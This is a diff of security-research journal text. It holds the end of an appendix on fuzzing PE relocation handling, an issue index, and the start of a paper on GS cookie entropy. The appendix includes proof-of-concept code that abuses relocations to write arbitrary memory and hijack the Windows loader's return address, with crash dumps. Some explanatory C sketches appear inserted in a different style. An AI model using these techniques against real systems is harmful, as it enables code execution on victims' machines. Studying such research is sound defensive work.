||||
__in PRELOC_FUZZ_CONTEXT FuzzContext)
|
||||
{
|
||||
PRELOCATION_BLOCK_CONTEXT ExtBlock = AllocateRelocationBlockContext(2);
|
||||
|
||||
ExtBlock->Rva = 0x10000;
|
||||
ExtBlock->Fixups[0] = (3 << 12) | 0x0;
|
||||
ExtBlock->Fixups[1] = (3 << 12) | 0x1;
|
||||
|
||||
PrependRelocationBlockContext(
|
||||
FuzzContext,
|
||||
ExtBlock);
|
||||
}
|
||||
|
||||
In this test, a relocation block is created that has a VirtualAddress of
|
||||
0x10000. When the binary is relocated to 0x10000, the actual address of the
|
||||
region that will be written to is 0x20000. In almost all versions of Windows
|
||||
NT, this address is the location of the process parameters structure. The
|
||||
block itself contains two fixup descriptors, each of which will result in a
|
||||
write to the first few bytes of the process parameters structure. The results
|
||||
after running this test are:
|
||||
|
||||
ntdll.dll: The relocation fixup is processed and results in two 32-bit writes
|
||||
to 0x20000 and 0x20001.
|
||||
|
||||
IDA: Ignores RVAs outside of the executable.
|
||||
|
||||
dumpbin.exe: N/A, dumpbin doesn't actually perform relocation fixups.
|
||||
|
||||
A.3) Self-updating Relocation Blocks
|
||||
|
||||
One of the more interesting nuances about the way relocation fixups are
|
||||
processed is that it's actually possible to create a relocation block that
|
||||
will perform fixups against other relocation blocks. This has the effect of
|
||||
making it such that the relocation information that appears on disk is
|
||||
actually different than what is processed when relocation fixups are applied.
|
||||
The basic idea behind this approach is to prepend certain relocation blocks
|
||||
that apply fixups to subsequent relocation blocks. This all works because
|
||||
relocation blocks are typically processed in the order that they appear. An
|
||||
example of this basic concept is shown below:
|
||||
|
||||
static VOID PrependSelfUpdatingRelocations(
|
||||
__in PPE_IMAGE Image,
|
||||
__in PRELOC_FUZZ_CONTEXT FuzzContext)
|
||||
{
|
||||
PRELOCATION_BLOCK_CONTEXT SelfBlock;
|
||||
PRELOCATION_BLOCK_CONTEXT RealBlock;
|
||||
ULONG RelocBaseRva;
|
||||
ULONG NumberOfBlocks = FuzzContext->NumberOfBlocks;
|
||||
ULONG Count;
|
||||
|
||||
//
|
||||
// Grab the base address that relocations will be loaded at
|
||||
//
|
||||
RelocBaseRva = FuzzContext->BaseRelocationSection->VirtualAddress;
|
||||
|
||||
//
|
||||
// Grab the first block before we start prepending
|
||||
//
|
||||
RealBlock = FuzzContext->NewRelocationBlocks;
|
||||
|
||||
//
|
||||
// Prepend self-updating relocation blocks for each block that exists
|
||||
//
|
||||
for (Count = 0; Count < NumberOfBlocks; Count++)
|
||||
{
|
||||
PRELOCATION_BLOCK_CONTEXT RelocationBlock;
|
||||
|
||||
RelocationBlock = AllocateRelocationBlockContext(2);
|
||||
|
||||
PrependRelocationBlockContext(
|
||||
FuzzContext,
|
||||
RelocationBlock);
|
||||
}
|
||||
|
||||
//
|
||||
// Walk through each self updating block, fixing up the real blocks to
|
||||
// account for the amount of displacement that will be added to their Rva
|
||||
// attributes.
|
||||
//
|
||||
for (SelfBlock = FuzzContext->NewRelocationBlocks, Count = 0;
|
||||
Count < NumberOfBlocks;
|
||||
Count++, SelfBlock = SelfBlock->Next, RealBlock = RealBlock->Next)
|
||||
{
|
||||
SelfBlock->Rva = RelocBaseRva + RealBlock->RelocOffset;
|
||||
|
||||
//
|
||||
// We'll relocate the two least significant bytes of the real block's RVA
|
||||
// and SizeOfBlock.
|
||||
//
|
||||
SelfBlock->Fixups[0] = (USHORT)((IMAGE_REL_BASED_HIGHLOW << 12) |
|
||||
(((RealBlock->RelocOffset - 2) & 0xfff)));
|
||||
SelfBlock->Fixups[1] = (USHORT)((IMAGE_REL_BASED_HIGHLOW << 12) |
|
||||
(((RealBlock->RelocOffset + 2) & 0xfff)));
|
||||
SelfBlock->Rva &= ~(PAGE_SIZE-1);
|
||||
|
||||
//
|
||||
// Account for the amount that will be added by the dynamic loader after
|
||||
// the first self-updating relocation blocks are processed.
|
||||
//
|
||||
*(PUSHORT)(&RealBlock->Rva) -= (USHORT)(FuzzContext->Displacement >> 16) + 2;
|
||||
*(PUSHORT)(&RealBlock->SizeOfBlock) -= (USHORT)(FuzzContext->Displacement >> 16) + 2;
|
||||
}
|
||||
}
|
||||
|
||||
This test works by prepending a self-updating relocation block for each
|
||||
relocation block that exists in the binary. In this way, if there were two
|
||||
relocation blocks that already existed, two self-updating relocation blocks
|
||||
would be prepended, one for each of the two existing relocation blocks.
|
||||
Following that, the self-updating relocation blocks are populated. Each
|
||||
self-updating relocation block is created with two fixup descriptors. These
|
||||
fixup descriptors are used to apply fixups to the VirtualAddress and
|
||||
SizeOfBlock attributes of its corresponding existing relocation block. Since
|
||||
a HIGHLOW fixup with a 64KB-aligned displacement only changes the two most significant bytes, the RVAs of the
|
||||
corresponding fields are adjusted down by two. The end result of this
|
||||
operation is that the first n relocation blocks are responsible for fixing up
|
||||
the VirtualAddress and SizeOfBlock attributes associated with subsequent
|
||||
relocation blocks. When relocations are processed in a linear fashion, the
|
||||
subsequent relocation blocks are updated in a way that allows them to be
|
||||
processed correctly.
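The effect can be reproduced with a toy model. The sketch below is not relocfuzz code and does not reproduce its exact adjustments: the image layout, the RVAs, and all function names are assumptions chosen for illustration. It models a loader that walks the relocation data linearly and reads each block header only when that block is reached, which is the behavior the technique depends on. Only HIGHLOW fixups are modeled, and values are stored little-endian as on x86.

```c
#include <stdint.h>

uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
uint32_t rd32(const uint8_t *p) { return (uint32_t)rd16(p) | ((uint32_t)rd16(p + 2) << 16); }
void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }

/* Linear walker over the relocation data. Returns 0 on success and -1 if a
 * block is malformed or a fixup points outside the image. */
int relocate_image(uint8_t *img, uint32_t img_size, uint32_t reloc_rva,
                   uint32_t reloc_size, uint32_t delta)
{
    uint32_t pos = reloc_rva;
    uint32_t end = reloc_rva + reloc_size;

    if (end < reloc_rva || end > img_size)
        return -1;
    while (end - pos >= 8) {
        uint32_t va = rd32(img + pos);        /* header is read at this point */
        uint32_t size = rd32(img + pos + 4);
        if (size < 8 || size > end - pos)
            return -1;
        for (uint32_t i = 8; i + 2 <= size; i += 2) {
            uint16_t entry = rd16(img + pos + i);
            uint64_t target = (uint64_t)va + (entry & 0x0fffu);
            if ((entry >> 12) != 3)           /* only HIGHLOW is modeled */
                continue;
            if (target + 4 > img_size)
                return -1;
            wr32(img + target, rd32(img + target) + delta);
        }
        pos += size;
    }
    return 0;
}

/* Toy image: packed dword at RVA 0x1000, relocation data at RVA 0x2000.
 * Block A (self-updating) repairs the header of block B (the real block). */
void build_demo_image(uint8_t *img, uint32_t delta)
{
    uint16_t hi = (uint16_t)(delta >> 16);
    uint8_t *a = img + 0x2000;
    uint8_t *b = img + 0x200c;

    wr32(img + 0x1000, 0x00011234u - delta);   /* packed data */
    wr32(a, 0x2000);                           /* A: VirtualAddress */
    wr32(a + 4, 12);                           /* A: SizeOfBlock */
    wr16(a + 8, (uint16_t)((3u << 12) | 0x00au));   /* B header offset - 2 */
    wr16(a + 10, (uint16_t)((3u << 12) | 0x00eu));  /* B header offset + 2 */
    wr32(b, 0x1000);                           /* B: real VirtualAddress */
    wr32(b + 4, 12);                           /* B: real SizeOfBlock */
    wr16(b + 8, (uint16_t)(3u << 12));         /* HIGHLOW at offset 0 */
    wr16(b + 10, 0);                           /* ABS padding entry */
    /* Pre-subtract what block A's fixups will add back at runtime. */
    wr16(b, (uint16_t)(rd16(b) - hi));
    wr16(b + 4, (uint16_t)(rd16(b + 4) - hi));
}
```

On disk, block B's header in this model holds a VirtualAddress of 0x8fff and a SizeOfBlock of 0x800b, which a parser that reads all headers up front would see as corrupt. After block A has been processed, the header reads 0x1000 and 12, and the packed dword is restored.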
|
||||
|
||||
Running this test against the set of test applications produces the following
|
||||
results:
|
||||
|
||||
ntdll.dll: The relocation blocks are fixed up accordingly and the application
|
||||
executes as expected.
|
||||
|
||||
IDA: Initial testing indicates that IDA is capable of handling self-updating
|
||||
relocation blocks.
|
||||
|
||||
dumpbin.exe: Crashes as the result of apparently corrupt relocation blocks:
|
||||
|
||||
DUMPBIN : fatal error LNK1000:
|
||||
Internal error during
|
||||
DumpBaseRelocations
|
||||
|
||||
Version 8.00.50727.42
|
||||
|
||||
ExceptionCode = C0000005
|
||||
ExceptionFlags = 00000000
|
||||
ExceptionAddress = 00443334
|
||||
NumberParameters = 00000002
|
||||
ExceptionInformation[ 0] = 00000000
|
||||
ExceptionInformation[ 1] = 7FFA2000
|
||||
|
||||
CONTEXT:
|
||||
Eax = 0000000A Esp = 0012E500
|
||||
Ebx = 00004F00 Ebp = 00000000
|
||||
Ecx = 7FFA2000 Esi = 00000000
|
||||
Edx = 781C3B68 Edi = 7FFA2000
|
||||
Eip = 00443334 EFlags = 00010293
|
||||
SegCs = 0000001B SegDs = 00000023
|
||||
SegSs = 00000023 SegEs = 00000023
|
||||
SegFs = 0000003B SegGs = 00000000
|
||||
Dr0 = 00000000 Dr3 = 00000000
|
||||
Dr1 = 00000000 Dr6 = 00000000
|
||||
Dr2 = 00000000 Dr7 = 00000000
|
||||
|
||||
A.4) Integer Overflows in Size Calculations
|
||||
|
||||
A potential source of mistakes that could be made when processing relocations
|
||||
has to do with the handling of the SizeOfBlock attribute of a relocation
|
||||
block. There is a potential for an integer overflow to occur in applications
|
||||
that don't properly handle situations where the SizeOfBlock attribute is less
|
||||
than the size of the base relocation structure (which is 8 bytes). In order
|
||||
to calculate the total number of fixups in a section, it's common to see a
|
||||
calculation like (Block->SizeOfBlock - 8) / 2. However, if a check isn't made
|
||||
to ensure that SizeOfBlock is at least 8, an integer overflow will occur. If
|
||||
this happens, the application processing relocations would be tricked into
|
||||
processing a very large number of relocations. An example of a test for this
|
||||
issue is shown below:
|
||||
|
||||
static VOID TestIntegerOverflow(
|
||||
__in PPE_IMAGE Image,
|
||||
__in PRELOC_FUZZ_CONTEXT FuzzContext)
|
||||
{
|
||||
PRELOCATION_BLOCK_CONTEXT EvilBlock = AllocateRelocationBlockContext(0);
|
||||
|
||||
EvilBlock->SizeOfBlock = 0;
|
||||
EvilBlock->Rva = 0x1000;
|
||||
|
||||
PrependRelocationBlockContext(
|
||||
FuzzContext,
|
||||
EvilBlock);
|
||||
}
|
||||
|
||||
In this example, a relocation block is created that has its SizeOfBlock
|
||||
attribute set to zero. This is invalid because the minimum size of a block is
|
||||
8 bytes. The results of this test against different applications are shown
|
||||
below:
|
||||
|
||||
ntdll.dll: Does not perform appropriate checks, which appears to result in an
|
||||
integer overflow:
|
||||
|
||||
(9d4.6dc): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=00000000 ebx=00014008 ecx=00011000 edx=80010000 esi=00015000 edi=ffffffff
|
||||
eip=7c91e163 esp=0013fa98 ebp=0013faac iopl=0 nv up ei pl nz na pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
||||
ntdll!LdrProcessRelocationBlockLongLong+0x1a:
|
||||
7c91e163 0fb706 movzx eax,word ptr [esi] ds:0023:00015000=????
|
||||
|
||||
IDA: Ignores the relocation block, but may not process relocations correctly
|
||||
as a result (unclear at this point).
|
||||
|
||||
dumpbin.exe: Refuses to show relocations:
|
||||
|
||||
Microsoft (R) COFF/PE Dumper Version 8.00.50727.42
|
||||
Copyright (C) Microsoft Corporation. All rights reserved.
|
||||
|
||||
Dump of file foo.exe
|
||||
|
||||
File Type: EXECUTABLE IMAGE
|
||||
|
||||
BASE RELOCATIONS #4
|
||||
|
||||
Summary
|
||||
|
||||
1000 .data
|
||||
1000 .rdata
|
||||
1000 .reloc
|
||||
1000 .text
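The size calculation discussed in this section can be reproduced with plain unsigned arithmetic. The sketch below uses illustrative names and is not taken from any of the tested applications; it contrasts the unchecked calculation with a version that validates SizeOfBlock first. The evenness check is an extra assumption, added because fixup descriptors are two bytes each.

```c
#include <stdint.h>

/* The commonly seen calculation. With SizeOfBlock < 8 the subtraction wraps
 * around and produces a very large count. */
uint32_t fixup_count_unchecked(uint32_t size_of_block)
{
    return (size_of_block - 8u) / 2u;
}

/* Checked variant: rejects blocks smaller than the 8-byte header, blocks
 * that run past the remaining relocation data, and odd sizes. Returns 1 and
 * stores the count on success, 0 otherwise. */
int fixup_count_checked(uint32_t size_of_block, uint32_t bytes_left, uint32_t *count)
{
    if (size_of_block < 8u || size_of_block > bytes_left || (size_of_block & 1u))
        return 0;
    *count = (size_of_block - 8u) / 2u;
    return 1;
}
```

With SizeOfBlock set to zero, the unchecked version yields 0x7ffffffc fixups, while the checked version rejects the block.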
|
||||
|
||||
A.5) Consistent Handling of Fixup Types
|
||||
|
||||
Applications that process relocation fixups may also differ in their level of
|
||||
support for different types of fixups. While most binaries today use the
|
||||
HIGHLOW fixup exclusively, there are still quite a few other types of fixups
|
||||
that can be applied. If differences in the way relocation fixups are
|
||||
processed can be identified, it may be possible to create a binary that
|
||||
relocates correctly in one application but not in another application. The
|
||||
following code demonstrates an example of this type of test:
|
||||
|
||||
static VOID TestConsistentRelocations(
|
||||
__in PPE_IMAGE Image,
|
||||
__in PRELOC_FUZZ_CONTEXT FuzzContext)
|
||||
{
|
||||
PRELOCATION_BLOCK_CONTEXT Block = AllocateRelocationBlockContext(16);
|
||||
ULONG Rva = FuzzContext->BaseRelocationSection->VirtualAddress;
|
||||
INT Index;
|
||||
|
||||
PrependRelocationBlockContext(
|
||||
FuzzContext,
|
||||
Block);
|
||||
|
||||
Block->Rva = 0x1000;
|
||||
|
||||
for (Index = 0; Index < 16; Index++)
|
||||
{
|
||||
//
|
||||
// Skip invalid fixup types
|
||||
//
|
||||
if ((Index >= 6 && Index <= 8) ||
|
||||
(Index >= 0xb && Index <= 0x10))
|
||||
continue;
|
||||
|
||||
Block->Fixups[Index] = (Index << 12) | Index;
|
||||
}
|
||||
}
|
||||
|
||||
This test works by prepending a relocation block that contains a relocation
|
||||
fixup for each different valid fixup type. This results in a relocation block
|
||||
that looks something like this:
|
||||
|
||||
BASE RELOCATIONS #4
|
||||
1000 RVA, 28 SizeOfBlock
|
||||
0 ABS
|
||||
1 HIGH EC8B
|
||||
2 LOW 8BEC
|
||||
3 HIGHLOW 5008458B
|
||||
4 HIGHADJ 0845 (5005)
|
||||
0 ABS
|
||||
0 ABS
|
||||
0 ABS
|
||||
9 IMM64
|
||||
A DIR64 8000209C15FF8000
|
||||
0 ABS
|
||||
0 ABS
|
||||
0 ABS
|
||||
0 ABS
|
||||
0 ABS
|
||||
|
||||
The results for this test are shown below:
|
||||
|
||||
|
||||
ntdll.dll: While not confirmed, it is assumed that the dynamic loader performs
|
||||
all fixup types correctly. This results in the following code being produced
|
||||
in the test binary:
|
||||
|
||||
foo+0x1000:
|
||||
00011000 55 push ebp
|
||||
00011001 8c6c8b46 mov word ptr [ebx+ecx*4+46h],gs
|
||||
00011005 895068 mov dword ptr [eax+68h],edx
|
||||
00011008 1830 sbb byte ptr [eax],dh
|
||||
0001100a 0100 add dword ptr [eax],eax
|
||||
0001100c 00b69b200100 add byte ptr foo+0x209b (0001209b)[esi],dh
|
||||
00011012 83c408 add esp,8
|
||||
|
||||
IDA: Appears to handle some relocation fixup types differently than the
|
||||
dynamic loader. Relocating the same binary in IDA results in the
|
||||
following being produced:
|
||||
|
||||
.text:00011000 push ebp
|
||||
.text:00011001 mov ebp, esp
|
||||
.text:00011003 mov eax, [ebp+9]
|
||||
.text:00011006 shr byte ptr [eax+18h], 1 ; "Called TestFunction()\n"
|
||||
.text:00011009 xor [ecx], al
|
||||
.text:00011009
|
||||
.text:0001100B db 0
|
||||
.text:0001100C
|
||||
.text:0001100C add byte ptr ds:printf[esi], dl
|
||||
.text:00011012 add esp, 8
|
||||
|
||||
Equates to:
|
||||
|
||||
.text:00011000 55 8B EC 8B 45 09 D0 68 18 30 01 00 00 96 9C 20
|
||||
.text:00011010 01 00 83 C4 08 C7 05 50
|
||||
|
||||
dumpbin.exe: N/A, dumpbin doesn't actually perform relocation fixups.
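To illustrate how differing levels of support lead to differing results, the sketch below applies a single fixup and reports whether the type was handled. It is an assumption-laden model, not the behavior of any tested tool: it follows the common description of the ABSOLUTE, HIGH, LOW, and HIGHLOW types (skip, add the high 16 bits, add the low 16 bits, add all 32 bits) and deliberately treats every other type as unsupported. All names are illustrative.

```c
#include <stdint.h>

enum { REL_ABSOLUTE = 0, REL_HIGH = 1, REL_LOW = 2, REL_HIGHLOW = 3 };

/* Little-endian load and store of an nbytes-wide field (nbytes <= 4). */
uint32_t load_le(const uint8_t *p, unsigned nbytes)
{
    uint32_t v = 0;
    for (unsigned i = 0; i < nbytes; i++)
        v |= (uint32_t)p[i] << (8 * i);
    return v;
}

void store_le(uint8_t *p, unsigned nbytes, uint32_t v)
{
    for (unsigned i = 0; i < nbytes; i++)
        p[i] = (uint8_t)(v >> (8 * i));
}

/* Apply one fixup to the field at `field`. Returns 1 if the type was
 * handled (ABSOLUTE is handled by doing nothing), 0 if it is unsupported. */
int apply_fixup(uint8_t *field, unsigned type, uint32_t delta)
{
    switch (type) {
    case REL_ABSOLUTE:
        return 1;
    case REL_HIGH:
        store_le(field, 2, load_le(field, 2) + (delta >> 16));
        return 1;
    case REL_LOW:
        store_le(field, 2, load_le(field, 2) + (delta & 0xffffu));
        return 1;
    case REL_HIGHLOW:
        store_le(field, 4, load_le(field, 4) + delta);
        return 1;
    default:
        return 0;
    }
}
```

A tool that silently skips the types this model rejects would produce different bytes than one that implements them, which is the kind of divergence this test looks for.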
|
||||
|
||||
A.6) Hijacking the Dynamic Loader
|
||||
|
||||
Since the dynamic loader in previous tests proved to be capable of writing to
|
||||
areas of memory external to the executable binary, it makes sense to test to
|
||||
see if it's possible to hijack execution control. One method of approaching
|
||||
this would be to have the dynamic loader apply a relocation to the return
|
||||
address of the function used to process relocations. When the function
|
||||
returns, it'll transfer control to whatever address the relocations have
|
||||
caused it to point to. An example of the code for this test is shown below:
|
||||
|
||||
static VOID TestHijackLoader(
|
||||
__in PPE_IMAGE Image,
|
||||
__in PRELOC_FUZZ_CONTEXT FuzzContext)
|
||||
{
|
||||
PRELOCATION_BLOCK_CONTEXT Block = AllocateRelocationBlockContext(1);
|
||||
|
||||
PrependRelocationBlockContext(
|
||||
FuzzContext,
|
||||
Block);
|
||||
|
||||
//
|
||||
// Set the RVA to the address of the return address on the stack taking into
|
||||
// account the displacement.
|
||||
//
|
||||
Block->Rva = 0x0012fab0;
|
||||
Block->Fixups[0] = (3 << 12) | 0;
|
||||
}
|
||||
|
||||
When a binary is executed that contains this relocation block, the dynamic
|
||||
loader ends up applying a relocation to the return address located at
|
||||
0x13fab0. Obviously, this address may be subject to change quite frequently,
|
||||
but as a means of illustrating a proof of concept it should be sufficient.
|
||||
And, just as one would expect, the dynamic loader does indeed overwrite the
|
||||
return address and make it possible to gain control of execution:
|
||||
|
||||
(c88.184): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=0001400a ebx=00014008 ecx=0013fab0 edx=80010000 esi=00000001 edi=ffffffff
|
||||
eip=fc92e10b esp=0013fac8 ebp=0013fae4 iopl=0 nv up ei pl zr na pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
|
||||
fc92e10b ?? ???
|
||||
0:000> kv
|
||||
ChildEBP RetAddr Args to Child
|
||||
WARNING: Frame IP not in any known module. Following frames may be wrong.
|
||||
0013fac4 00010000 00261f18 7ffdc000 80010000 0xfc92e10b
|
||||
0013fae4 7c91e08c 00010000 00000000 00000000 image00010000
|
||||
0013fb08 7c93ecd3 00010000 7c93f584 00000000 ntdll!LdrRelocateImage+0x1d (FPO: [Non-Fpo])
|
||||
0013fc94 7c921639 0013fd30 7c900000 0013fce0 ntdll!LdrpInitializeProcess+0xea0 (FPO: [Non-Fpo])
|
||||
0013fd1c 7c90eac7 0013fd30 7c900000 00000000 ntdll!_LdrpInitialize+0x183 (FPO: [Non-Fpo])
|
||||
00000000 00000000 00000000 00000000 00000000 ntdll!KiUserApcDispatcher+0x7
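The numbers in this test can be checked with two small helpers. The names are illustrative assumptions. The original return address of 0x7c91e10b used in the usage note is also an assumption: it is inferred by subtracting the displacement from the faulting eip and is not stated in the debugger output.

```c
#include <stdint.h>

/* RVA to place in the relocation block so that the fixup lands on a given
 * absolute address once the image is loaded at load_base. */
uint32_t block_rva_for_address(uint32_t target_address, uint32_t load_base)
{
    return target_address - load_base;
}

/* Value that a dword holds after a HIGHLOW fixup has been applied to it. */
uint32_t value_after_highlow(uint32_t original_value, uint32_t displacement)
{
    return original_value + displacement;
}
```

For a load base of 0x10000, targeting the stack slot at 0x13fab0 requires an RVA of 0x12fab0. Adding the displacement 0x80010000 to an assumed return address of 0x7c91e10b gives 0xfc92e10b, the eip at which the access violation is reported.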
|
||||
|
||||
Bibliography
|
||||
|
||||
[1] Carrera, Ero. Packer Tracing.
|
||||
http://nzight.blogspot.com/2006/06/packer-tracing.html;
|
||||
accessed Dec 15, 2006.
|
||||
|
||||
[2] Szor, Peter. Advanced Code Evolution Techniques and Computer Virus Generator Kits.
|
||||
http://www.informit.com/articles/article.asp?p=366890&seqNum=3&rl=1;
|
||||
accessed Jan 8, 2007.
|
||||
|
||||
[3] Szor, Peter. Tricky Relocations.
|
||||
http://peterszor.com/resurrel.pdf;
|
||||
accessed Jan 8, 2007.
|
1570
uninformed/6.3.txt
Normal file
File diff suppressed because it is too large
Load diff
17
uninformed/6.txt
Normal file
|
@ -0,0 +1,17 @@
|
|||
Engineering in Reverse
|
||||
Subverting PatchGuard Version 2
|
||||
Skywing
|
||||
Windows Vista x64 and recently hotfixed versions of the Windows Server 2003 x64 kernel contain an updated version of Microsoft's kernel-mode patch prevention technology known as PatchGuard. This new version of PatchGuard improves on the previous version in several ways, primarily dealing with attempts to increase the difficulty of bypassing PatchGuard from the perspective of an independent software vendor (ISV) deploying a driver that patches the kernel. The feature-set of PatchGuard version 2 is otherwise quite similar to PatchGuard version 1; the SSDT, IDT/GDT, various MSRs, and several kernel global function pointer variables (as well as kernel code) are guarded against unauthorized modification. This paper proposes several methods that can be used to bypass PatchGuard version 2 completely. Potential solutions to these bypass techniques are also suggested. Additionally, this paper describes a mechanism by which PatchGuard version 2 can be subverted to run custom code in place of PatchGuard's system integrity checking code, all while leaving no traces of any kernel patching or custom kernel drivers loaded in the system after PatchGuard has been subverted. This is particularly interesting from the perspective of using PatchGuard's defenses to hide kernel mode code, a goal that is (in many respects) completely contrary to what PatchGuard is designed to do.
|
||||
pdf | txt | code.tgz | html
|
||||
|
||||
Locreate: An Anagram for Relocate
|
||||
skape
|
||||
This paper presents a proof of concept executable packer that does not use any custom code to unpack binaries at execution time. This is different from typical packers which generally rely on packed executables containing code that is used to perform the inverse of the packing operation at runtime. Instead of depending on custom code, the technique described in this paper uses documented behavior of the dynamic loader as a mechanism for performing the unpacking operation. This difference can make binaries packed using this technique more difficult to signature and analyze, but only when presented to an untrained eye. The description of this technique is meant to be an example of a fun thought exercise and not as some sort of revolutionary packer. In fact, it's been used in the virus world many years prior to this paper.
|
||||
pdf | txt | code.tgz | html
|
||||
|
||||
Exploitation Technology
|
||||
Exploiting 802.11 Wireless Driver Vulnerabilities on Windows
|
||||
Johnny Cache, H D Moore, skape
|
||||
This paper describes the process of identifying and exploiting 802.11 wireless device driver vulnerabilities on Windows. This process is described in terms of two steps: pre-exploitation and exploitation. The pre-exploitation step provides a basic introduction to the 802.11 protocol along with a description of the tools and libraries the authors used to create a basic 802.11 protocol fuzzer. The exploitation step describes the common elements of an 802.11 wireless device driver exploit. These elements include things like the underlying payload architecture that is used when executing arbitrary code in kernel-mode on Windows, how this payload architecture has been integrated into the 3.0 version of the Metasploit Framework, and the interface that the Metasploit Framework exposes to make developing 802.11 wireless device driver exploits easy. Finally, three separate real world wireless device driver vulnerabilities are used as case studies to illustrate the application of this process. It is hoped that the description and illustration of this process can be used to show that kernel-mode vulnerabilities can be just as dangerous and just as easy to exploit as user-mode vulnerabilities. In so doing, awareness of the need for more robust kernel-mode exploit prevention technology can be raised.
|
||||
pdf | txt | code.tgz | html
|
||||
|
958
uninformed/7.1.txt
Normal file
|
@ -0,0 +1,958 @@
|
|||
Reducing the Effective Entropy of GS Cookies
|
||||
skape
|
||||
mmiller@hick.org
|
||||
3/2007
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: This paper describes a technique that can be used to reduce the
|
||||
effective entropy in a given GS cookie by roughly 15 bits. This reduction is
|
||||
made possible because GS uses a number of weak entropy sources that can, with
|
||||
varying degrees of accuracy, be calculated by an attacker. It is important to
|
||||
note, however, that the ability to calculate the values of these sources for
|
||||
an arbitrary cookie currently relies on an attacker having local access to the
|
||||
machine, such as through the local console or through terminal services. This
|
||||
effectively limits the use of this technique to stack-based local privilege
|
||||
escalation vulnerabilities. In addition to the general entropy reduction
|
||||
technique, this paper discusses the amount of effective entropy that exists in
|
||||
services that automatically start during system boot. It is hypothesized that
|
||||
these services may have more predictable states of entropy due to the relative
|
||||
consistency of the boot process. While the techniques described in this paper
|
||||
do not illustrate a complete break of GS, any inherent weakness can have
|
||||
disastrous consequences given that GS is a static, compile-time security
|
||||
solution. It is not possible to simply distribute a patch. Instead,
|
||||
applications must be recompiled to take advantage of any security
|
||||
improvements. In that vein, the paper proposes some solutions that could
|
||||
be applied to address the problems that are outlined.
|
||||
|
||||
Thanks: Aaron Portnoy for lending some hardware for sample collection.
|
||||
Johnny Cache and Richard Johnson for discussions and suggestions.
|
||||
|
||||
2) Introduction
|
||||
|
||||
Stack-based buffer overflows are generally regarded as one of the most common
|
||||
and easiest to exploit classes of software vulnerabilities. This prevalence
|
||||
has led to the implementation of many security solutions that attempt to
|
||||
prevent the exploitation of these vulnerabilities. Some of these solutions
|
||||
include StackGuard[1], ProPolice[2], and Microsoft's /GS compiler switch[5]. The
|
||||
shared premise of these solutions involves the placement of a cookie, or
|
||||
canary, between the buffers stored in a stack frame and the stack frame's
|
||||
return address. The cookie that is placed on the stack is used as a marker to
|
||||
detect if a buffer overflow has occurred prior to allowing a function to
|
||||
return. This simple concept can be very effective at making the exploitation
|
||||
of stack-based buffer overflows unreliable.
|
||||
|
||||
The cookie-based approach to detecting stack-based buffer overflows involves
|
||||
three general steps. First, a cookie that will be inserted into a function's
|
||||
stack frame must be generated. The approaches taken to generate cookies vary
|
||||
quite substantially, some having more implications than others. Once a cookie
|
||||
has been generated, it must be pushed onto the stack in the context of a
|
||||
function's prologue at execution time. This ensures that the cookie is placed
|
||||
before the return address (and perhaps other values) on the stack. Finally, a
|
||||
check must be added to a function's epilogue to make sure that the cookie that
|
||||
was stored in the stack frame is the value that it was initialized to in the
|
||||
function prologue. If an overflow of a stack-based buffer occurs, then it's
|
||||
likely that it will have overwritten the cookie stored after the buffer. When
|
||||
a mismatch is detected, steps can be taken to securely terminate the process
|
||||
in a way that will prevent exploitation.
|
||||
|
||||
The security of a cookie-based solution hinges on the fact that an attacker
|
||||
doesn't know, or is unable to generate, the cookie that is stored in a stack
|
||||
frame. Since it's impossible to guarantee in all situations that an attacker
|
||||
won't be able to generate the bytes that compose the value of a cookie, it
|
||||
really all boils down to the cookie being kept secret. If the cookie is not
|
||||
kept secret, then the presence of a cookie will provide no protection when it
|
||||
comes to exploiting a stack-based buffer overflow vulnerability.
|
||||
Additionally, if an attacker can trigger an exploitable condition before the
|
||||
cookie is checked, then it follows that the cookie will provide no protection.
|
||||
One example of this might include overwriting a function pointer on the stack
|
||||
that is called prior to returning from the function.
|
||||
|
||||
While the StackGuard and ProPolice implementations are interesting and useful,
|
||||
the author feels that no implementation is more critical than the one provided
|
||||
by Microsoft. The reason for this is the simple fact that the vast majority
|
||||
of all desktops, and a non-trivial number of servers, run applications
|
||||
compiled with Microsoft's Visual C compiler. Any one weakness found in
|
||||
Microsoft's implementation could mean that a large number of applications are
|
||||
no longer protected against stack-based buffer overflows. In fact, there has
|
||||
been previous research that has pointed out flaws or limitations in
|
||||
Microsoft's implementation. For example, David Litchfield pointed out that
|
||||
even though stack cookies are present, it may still be possible to overwrite
|
||||
exception registration records on the stack which may be called before the
|
||||
function actually returns. This discovery was one of the reasons that
|
||||
Microsoft later introduced SafeSEH (which had its own set of issues)[6].
|
||||
Similarly, Chris Ren et al. from Cigital pointed out the potential implications
|
||||
of a function pointer being used in the path of the error handler for the case
|
||||
of a GS cookie mismatch occurring[9]. While not directly related to a particular
|
||||
flaw or limitation in GS, eEye has described some of the problems that come
|
||||
when secrets get leaked[3].
|
||||
|
||||
Even though these issues and limitations have existed, Microsoft's GS
|
||||
implementation at the time of this writing is considered by most to be secure.
|
||||
While this paper will not present a complete break of Microsoft's GS
|
||||
implementation, it will describe certain quirks and scenarios that may make it
|
||||
possible to reduce the amount of effective entropy that exists in the cookies
|
||||
that are generated. As with cryptography, any reduction of the entropy that
|
||||
exists in the GS cookie effectively makes it so there are fewer unknown
|
||||
portions of the cookie. This makes the cookie easier to guess by reducing the
|
||||
total number of possibilities. Beyond this, it is expected that additional
|
||||
research may find ways to further reduce the amount of entropy beyond that
|
||||
described in this document. One critical point that must be made is that
|
||||
since the current GS implementation is statically linked when binaries are
|
||||
compiled, any flaw that is found in the implementation will require a
|
||||
recompilation of all binaries affected by it. To help limit the scope, only
|
||||
the 32-bit version of GS will be analyzed, though it is thought that similar
|
||||
attacks may exist on the 64-bit version as well.
|
||||
|
||||
The structure of this paper is as follows. In chapter 3, a brief description
|
||||
